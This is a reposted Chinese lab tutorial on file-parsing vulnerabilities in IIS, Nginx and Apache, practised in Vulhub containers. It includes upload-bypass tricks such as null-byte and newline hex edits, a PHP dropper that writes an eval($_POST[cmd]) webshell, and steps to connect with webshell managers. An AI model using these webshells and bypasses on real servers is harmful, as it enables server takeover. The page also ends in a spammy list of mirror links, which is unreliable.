当前位置：首页 > news >正文

个人网站如何进行网络推广中国做网站找谁

news 2025/11/1 10:55:57

个人网站如何进行网络推广,中国做网站找谁,做360手机网站优,全球中文网站排名文件解析漏洞一、IIS解析漏洞用windowserver2003安装IIS测试 1.1 IIS6.X 方法一#xff1a;目录解析在网站下建立文件夹的名字为.asp/.asa的文件夹#xff0c;其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 1.txt文件里是asp文件的语法查看当前时间方…文件解析漏洞一、IIS解析漏洞用windowserver2003安装IIS测试 1.1 IIS6.X 方法一目录解析在网站下建立文件夹的名字为.asp/.asa的文件夹其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 1.txt文件里是asp文件的语法查看当前时间方法二畸形文件解析在IIS6处理文件解析时分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx。 1.asp;.jpg文件内容为%now()% 1.2 IIS7.X 在IIS7.0和I1S7.5版本下也存在解析漏洞在默认Fast-CGI开启状况下在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php解析为 php 文件。利用条件 php.ini里的cgi.fix_pathinfo1 开启lS7在Fast-CGl运行模式下环境配置下载phpstudy 网址Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 步骤二:配置 php.ini文件将cgi.fix_pathinfo1 前;删除…并重启… 配置IIS的网站 GetShell 步骤一:将PHP一句话木马写到1.php并更改后缀为1.jpg上传到目标站点…利用解析漏洞进行访问… http://172.16.1.65:8980/1.jpg/.php下面的1.jpg写的是phpinfo(); 第二步用菜刀、蚁剑连接 1.3:修复方式 #1.程序方面 1、对新建目录文件名进行过滤不允许新建包含.的文件夹。 2、取消网站后台新建目录的功能不允许新建目录。#2.服务器方面 1、限制上传目录的脚本执行权限不允许执行脚本。 2、过滤.asp/xm.jpg,通过ISApi组件过滤。在httpd.ini加入了以下规则 ASP RewriteRule(.*).asp/(.*)/no.gif RewriteRule(.*).Asp/(.*)/no.gif RewriteRule(.*).aSp/(.*)/no.gif RewriteRule(.*).asP/(.*)/no.gif二、Nginx解析漏洞 2.1:nginx_parsing 这个解析漏洞其实是PHP CGI的漏洞在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的当URL中有不存在的文件PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将/xx.jpg/xx.php 解析为 php 文件。利用条件 Nginx 0.8.37cgi.fix_pathinfo1 利用姿势 Nginx的文件解析漏洞…和I1S7.0的解析漏洞同样的原理,因为 cqi.fix pathinfo1 造成的解析漏洞… PS:同样使用1.jpg/.php 方式进行绕过… 案例步骤一:进入以下Vulhub路径并开启容器… cd /nginx/nginx_parsing_vulnerability docker-compose up -d docker ps -a步骤二:浏览器中访问网站… http://192.168.30.131/步骤三制作图片码上传访问图片位置在后方加上/.php http://192.168.30.131/uploadfiles/969bd13f5b5a5d582c2a6ef02212b1ae.jpg/.php步骤四用蚁剑连接shell GetShell 步骤一:在shell.jpg中写入以下代码… GIF89a?php fputs(fopen(shell.php,w),?php eval($_POST[cmd])?);?步骤二:上传该图片并访问…紧接着利用解析漏洞执行其中的PHP代码 http://192.168.30.131/uploadfiles/a7c3ce076585477741d951d179ab07dc.jpg/.php访问jpg文件后缀加/.php解析成php执行然后访问shell.php页面为空蚁剑连接shell 2.2:CVE-2013-4547 此漏洞为文件名逻辑漏洞该漏洞在上传图片时修改其16进制编码可使其绕过策略导致解析为php。当Nginx得到一个用户请求时首先对url进行解析进行正则匹配如果匹配到以.php后缀结尾的文件名会将请求的PHP文件交给PHP-CGI去解析。影响版本 Nginx 0.8.411.4.3/1.5.01.5.7 利用姿势步骤一:使用以下命令启动靶机并通过浏览器访问靶场页面. cd vulhub-master/nginx/CVE-2013-4547x //切换到靶机目录 docker-compose up -d //打开环境 #靶场页面 http://101.42.118.221:8080#info.php ?php phpinfo();?步骤二:直接上传 info.php 被拦截… 修改文件后缀为.jpg进行BP抓包上传—filename在后面添加空格并给上.php 后在16进制修改中将原本连个空格的 0x20 0x20 修改为如下即 0x20 0x00 进行发包… 放包后页面上传成功访问 http://192.168.30.131:8089/uploadfiles/shell.jpg%20%20.php抓包将%20%20替换成两空格然后替换16进制从0x20 0x20 替换成0x20 0x00 放行访问成功 GetShell 如果上传 ?php eval($_POST[cmd]);?里面有空格无法处理就会变成我们用这句话上传一个shell.php ?php fputs(fopen(shell.php,w),?php eval($_POST[cmd])?);?用以上的方法加两个空格修改16进制即可最后可以发现能访问到蚁剑连接三、Apache解析漏洞 3.1:apache_parsing 在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析就再往左判断。如1.php.xxxxx 利用姿势步骤一:进入Vulhub靶场并执行以下命令启动靶场… cd /root/vulhub/httpd/apache_parsing_vulnerability vi docker-compose.yml 修改端口和版本号 docker-compose up -d步骤二:访问靶机并上传 shell.php.jpg 文件文件内容为 phpinfo 函数 3.2:CVE-2017-15715 Apache HTTPD是一款HTTP服务器它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞在解析PHP时1.php\x0A将被按照PHP后缀进行解析导致绕过一些服务器的安全策略。影响版本 2.4.0~2.4.29 利用姿势步骤一:进入Vulhub靶场并开启目标靶机进行访问… cd /root/vulhub/httpd/CVE-2017-15715 vi docker-compose.yml //配置文件修改端口和版本号 docker-compose up -d //开启访问 http://192.168.30.131:8091/步骤二:尝试上传一句话木马文件发现被拦截… 然后抓包在evil.php后面加上空格16进制0x20改成0x0a–放包访问evil.php文件蚁剑连接shell
文章转载自：
http://www.morning.dwrbn.cn.gov.cn.dwrbn.cn
http://www.morning.lkbyq.cn.gov.cn.lkbyq.cn
http://www.morning.jxlnr.cn.gov.cn.jxlnr.cn
http://www.morning.bgygx.cn.gov.cn.bgygx.cn
http://www.morning.zkpwk.cn.gov.cn.zkpwk.cn
http://www.morning.ytnn.cn.gov.cn.ytnn.cn
http://www.morning.kdnbf.cn.gov.cn.kdnbf.cn
http://www.morning.jfmyt.cn.gov.cn.jfmyt.cn
http://www.morning.rszwc.cn.gov.cn.rszwc.cn
http://www.morning.cpqqf.cn.gov.cn.cpqqf.cn
http://www.morning.kpwcx.cn.gov.cn.kpwcx.cn
http://www.morning.spqtq.cn.gov.cn.spqtq.cn
http://www.morning.xkjrs.cn.gov.cn.xkjrs.cn
http://www.morning.pmhln.cn.gov.cn.pmhln.cn
http://www.morning.wmnpm.cn.gov.cn.wmnpm.cn
http://www.morning.nsyzm.cn.gov.cn.nsyzm.cn
http://www.morning.rdfq.cn.gov.cn.rdfq.cn
http://www.morning.sxjmz.cn.gov.cn.sxjmz.cn
http://www.morning.rrhfy.cn.gov.cn.rrhfy.cn
http://www.morning.fbpyd.cn.gov.cn.fbpyd.cn
http://www.morning.gwdkg.cn.gov.cn.gwdkg.cn
http://www.morning.tstkr.cn.gov.cn.tstkr.cn
http://www.morning.bxgpy.cn.gov.cn.bxgpy.cn
http://www.morning.wnwjf.cn.gov.cn.wnwjf.cn
http://www.morning.fgxr.cn.gov.cn.fgxr.cn
http://www.morning.qnyf.cn.gov.cn.qnyf.cn
http://www.morning.cknrs.cn.gov.cn.cknrs.cn
http://www.morning.ytmx.cn.gov.cn.ytmx.cn
http://www.morning.nwtmy.cn.gov.cn.nwtmy.cn
http://www.morning.mehrim.com.gov.cn.mehrim.com
http://www.morning.rynqh.cn.gov.cn.rynqh.cn
http://www.morning.tpps.cn.gov.cn.tpps.cn
http://www.morning.nrgdc.cn.gov.cn.nrgdc.cn
http://www.morning.cpctr.cn.gov.cn.cpctr.cn
http://www.morning.dmzqd.cn.gov.cn.dmzqd.cn
http://www.morning.stsnf.cn.gov.cn.stsnf.cn
http://www.morning.muzishu.com.gov.cn.muzishu.com
http://www.morning.ckfyp.cn.gov.cn.ckfyp.cn
http://www.morning.nfbnl.cn.gov.cn.nfbnl.cn
http://www.morning.wnhml.cn.gov.cn.wnhml.cn
http://www.morning.wzjhl.cn.gov.cn.wzjhl.cn
http://www.morning.stmkm.cn.gov.cn.stmkm.cn
http://www.morning.xphcg.cn.gov.cn.xphcg.cn
http://www.morning.nbrkt.cn.gov.cn.nbrkt.cn
http://www.morning.brlcj.cn.gov.cn.brlcj.cn
http://www.morning.tgyzk.cn.gov.cn.tgyzk.cn
http://www.morning.tsynj.cn.gov.cn.tsynj.cn
http://www.morning.ghrlx.cn.gov.cn.ghrlx.cn
http://www.morning.gpxbc.cn.gov.cn.gpxbc.cn
http://www.morning.ahlart.com.gov.cn.ahlart.com
http://www.morning.hpkgm.cn.gov.cn.hpkgm.cn
http://www.morning.kpwdt.cn.gov.cn.kpwdt.cn
http://www.morning.rgkd.cn.gov.cn.rgkd.cn
http://www.morning.ryrgx.cn.gov.cn.ryrgx.cn
http://www.morning.jmtrq.cn.gov.cn.jmtrq.cn
http://www.morning.jwqqd.cn.gov.cn.jwqqd.cn
http://www.morning.clpfd.cn.gov.cn.clpfd.cn
http://www.morning.tmnyj.cn.gov.cn.tmnyj.cn
http://www.morning.mmzhuti.com.gov.cn.mmzhuti.com
http://www.morning.cbnjt.cn.gov.cn.cbnjt.cn
http://www.morning.jqsyp.cn.gov.cn.jqsyp.cn
http://www.morning.npmpn.cn.gov.cn.npmpn.cn
http://www.morning.ytbr.cn.gov.cn.ytbr.cn
http://www.morning.nxhjg.cn.gov.cn.nxhjg.cn
http://www.morning.rrxnz.cn.gov.cn.rrxnz.cn
http://www.morning.txjrc.cn.gov.cn.txjrc.cn
http://www.morning.srnhk.cn.gov.cn.srnhk.cn
http://www.morning.ghxtk.cn.gov.cn.ghxtk.cn
http://www.morning.mpngp.cn.gov.cn.mpngp.cn
http://www.morning.lcwhn.cn.gov.cn.lcwhn.cn
http://www.morning.ygflz.cn.gov.cn.ygflz.cn
http://www.morning.nbsbn.cn.gov.cn.nbsbn.cn
http://www.morning.wqpr.cn.gov.cn.wqpr.cn
http://www.morning.kxypt.cn.gov.cn.kxypt.cn
http://www.morning.smspc.cn.gov.cn.smspc.cn
http://www.morning.ynbyk.cn.gov.cn.ynbyk.cn
http://www.morning.rgsgk.cn.gov.cn.rgsgk.cn
http://www.morning.bkwd.cn.gov.cn.bkwd.cn
http://www.morning.wrtxk.cn.gov.cn.wrtxk.cn
http://www.morning.hmsong.com.gov.cn.hmsong.com

http://www.tj-hxxt.cn/news/267839.html

相关文章：

做网站需要什么权限今天建设银行网站无法登录

建一个网站买完域名后应该怎么做住房和城乡建设部网站执业资格注册中心

物流管理网站建设深圳欧啦啦网站建设

苏州工业园区最新通告优化员工

品牌网站建设四川定制产品网站有哪些

可视化网站制作软件还有哪些数据库网站

rp做网站wordpress域名授权破解版

做网站需要执照吗西安室内设计公司排名

网站整体设计硬件开发和软件开发

做网站的资源哪里找吕梁网站定制

长沙网站制作好公司宿州网站开发建设

深圳住房和城乡建设局网站如何用 ftp上传网站

青岛高端网站制作建设化工网站的目的

洛江区住房和城乡建设局网站seo关键词优化公司推荐

做网站要搭建本地服务器么国外营销型网站

怎么做企业网站建设东莞seo建站投放

专业网站推广服务咨询首页排名优化公司

南宁网站建设优化排名wordpress 导航图片

微博优惠券网站怎么做台州本地做网站的

网站制作学费多少钱WordPress批量建站系统

网站建设服务采购方案建立网站的英文短语

网站建议公司开发网址需要多少钱

商城网页设计网站过度优化

西安做网站好的公司app 微信网站三合一

安徽合肥做网站建筑设计公司网站模板

单页网站产品互联网行业发展现状

镜子厂家东莞网站建设做旅游网站的好处

商田科技网站建设部网站1667号下载

大型网站建设机构哪家好美工自学网

烟台网站建设熊掌号做新媒体国外网站